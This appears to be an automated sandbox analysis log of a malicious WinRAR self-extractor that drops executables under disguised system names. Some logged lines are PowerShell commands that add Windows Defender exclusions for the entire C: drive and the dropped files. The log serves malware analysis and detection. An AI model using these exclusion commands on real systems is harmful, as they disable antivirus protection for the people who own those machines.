Source: C:\Users\user\Desktop\HMhdtzxEHf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: WWV5Fl1V7B.81.dr, yqnzCXwB1W.81.dr, MkxctjzYIB.81.dr, 0HGZ8n8wDZ.81.dr, IBmZyEMkAY.81.dr, M8IiWlZHLU.81.dr, EZHx84UQ8r.81.dr, E6gHH0q0OS.81.dr, mozmE8e9NO.81.dr, BmMFhncVO3.81.dr, UegalEoxZ1.81.dr, p9qc6eX7Hw.81.dr, sKZG7HpWm6.81.dr, SNrVU9zagI.81.dr, gJsdKQIPIW.81.dr, MB3u1QHscs.81.dr, gOqp7rJVPV.81.dr, hBXpIC5HNG.81.dr, mivPDBUVsT.81.dr, LXhhdf7XBX.81.dr, lUrDpdxxLT.81.dr, B3b9DIsJMO.81.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: HMhdtzxEHf.exe Virustotal: Detection: 73%
Source: HMhdtzxEHf.exe ReversingLabs: Detection: 71%
Source: C:\Users\user\Desktop\HMhdtzxEHf.exe File read: C:\Users\user\Desktop\HMhdtzxEHf.exe
Source: unknown Process created: C:\Users\user\Desktop\HMhdtzxEHf.exe "C:\Users\user\Desktop\HMhdtzxEHf.exe"
Source: C:\Users\user\Desktop\HMhdtzxEHf.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainbrowserNet\Fsnwm63YgSc5SNPvS73lTcLZ0fh.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ChainbrowserNet\serverDll.exe "C:\ChainbrowserNet/serverDll.exe"
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ChainbrowserNet/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\Memory Compression.exe'
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\backgroundTaskHost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Videos\System.exe'
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\upfc.exe'
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\serverDll.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe "C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe "C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe"
Source: C:\ChainbrowserNet\serverDll.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ff39zMQKS5.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: unknown Process created: C:\Recovery\Memory Compression.exe "C:\Recovery\Memory Compression.exe"
Source: unknown Process created: C:\Recovery\Memory Compression.exe "C:\Recovery\Memory Compression.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown Process created: C:\ChainbrowserNet\serverDll.exe C:\ChainbrowserNet\serverDll.exe
Source: unknown Process created: C:\ChainbrowserNet\serverDll.exe C:\ChainbrowserNet\serverDll.exe
Source: unknown Process created: C:\Users\Default\Videos\System.exe "C:\Users\Default User\Videos\System.exe"
Source: unknown Process created: C:\Users\Default\Videos\System.exe "C:\Users\Default User\Videos\System.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\ChainbrowserNet\backgroundTaskHost.exe "C:\ChainbrowserNet\backgroundTaskHost.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Videos\System.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\upfc.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainbrowserNet\serverDll.exe'Jump to behavior
                                    Source: C:\ChainbrowserNet\serverDll.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Ff39zMQKS5.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\ChainbrowserNet\backgroundTaskHost.exe "C:\ChainbrowserNet\backgroundTaskHost.exe"
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                    Source: Window Recorder Window detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                    Source: HMhdtzxEHf.exe Static file information: File size 4000497 > 1048576
                                    Source: HMhdtzxEHf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: HMhdtzxEHf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: HMhdtzxEHf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: HMhdtzxEHf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: HMhdtzxEHf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: HMhdtzxEHf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: HMhdtzxEHf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: HMhdtzxEHf.exe
                                    Source: HMhdtzxEHf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: HMhdtzxEHf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: HMhdtzxEHf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: HMhdtzxEHf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: HMhdtzxEHf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exe File created: C:\ChainbrowserNet\__tmp_rar_sfx_access_check_6411953
                                    Source: HMhdtzxEHf.exe Static PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exe Code function: 0_2_00A4F640 push ecx; ret 0_2_00A4F653
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exe Code function: 0_2_00A4EB78 push eax; ret 0_2_00A4EB96
                                    Source: C:\ChainbrowserNet\serverDll.exe Code function: 4_2_00007FFD9BAA4766 push edi; iretd 4_2_00007FFD9BAA4770
                                    Source: C:\ChainbrowserNet\serverDll.exe Code function: 4_2_00007FFD9BE6812B push ebx; ret 4_2_00007FFD9BE6816A

                                    Persistence and Installation Behavior

                                    Source: C:\ChainbrowserNet\serverDll.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exe File created: C:\ChainbrowserNet\serverDll.exe
                                    Source: C:\ChainbrowserNet\serverDll.exe File created: C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe
                                    Source: C:\ChainbrowserNet\serverDll.exe File created: C:\Users\Default\Videos\System.exe
                                    Source: C:\ChainbrowserNet\serverDll.exe File created: C:\ChainbrowserNet\backgroundTaskHost.exe
                                    Source: C:\ChainbrowserNet\serverDll.exe File created: C:\Windows\Vss\Writers\Application\upfc.exe
                                    Source: C:\ChainbrowserNet\serverDll.exe File created: C:\Recovery\Memory Compression.exe

                                    Hooking and other Techniques for Hiding and Protection

                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\HMhdtzxEHf.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainbrowserNet\serverDll.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
